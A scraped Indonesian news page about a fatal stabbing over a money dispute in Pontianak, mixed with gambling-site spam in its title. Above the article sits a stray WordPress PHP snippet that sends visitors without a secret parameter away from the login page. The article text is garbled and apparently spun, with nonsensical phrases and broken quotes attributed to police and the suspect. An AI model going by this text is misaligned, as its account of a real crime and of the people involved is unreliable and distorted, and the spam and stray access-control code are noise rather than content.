//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Ada mayat di jalan dengan noda darah di atasnya, ternyata temannya ditusuk dalam duel tersebut | daftar s128_www.s1288.net_s1288 net

TRIBUNNEWS.COM-Jasad pria berlumuran darah ditemukan di Pontianak. –Dia ternyata menjadi korban dari pertempuran mematikan dengan teman-temannya.

Pertempuran ini digelar pada Minggu, 4 Oktober 2020 di Jalan Abdulrahman Saleh (Galan Sawit) di Kabupaten Pontianak Tenggara. Barang yang belum disumbangkan, dan dana yang belum dikembalikan disimpan,

Baca: Jadwal bar sayuran yang ditabrak dan dibunuh oleh pengemudi mabuk LGX Kijang pada hari sebelumnya — Kami tahu tersangka EP (63) Merupakan penduduk Pontianak di sebelah tenggara. — Saat korban dan temannya BH (58) adalah warga Jalan Sungai Raya di Kecamatan Kubu Raya.

Kepada polisi, tersangka mengaku menemui korban pagi tadi untuk menagih janji korban. Proyek, dan memintanya untuk mengembalikan uang yang dia berikan.

Mengklaim bahwa dia adalah presiden yang tidak mengorganisir pengacara, kemudian korban kembali berusaha menghindari pelaku.

“Saat kita ketemu barusan, katanya gampang, banyak pekerjaan, jangan lakukan. Jangan percaya saya, saya Ketua Pengacara”, ujarnya kepada Kepolisian Resor Pontianak dalam jumpa pers di Mapolda Pontianak. Direktur Kobispol Komarudin mengucapkan sumpah. – “Ketika dia masih mengendarai sepeda, ketika saya keluar dari mobil, saya jatuh, saya meraih pisau, dia menendang wajah saya, saya jatuh, dia mengejar saya. Ketika saya mendapatkannya, saya Menusuknya dari belakang “EP menjelaskan garis waktu kejadian.

Add Comment

Your email address will not be published. Required fields are marked *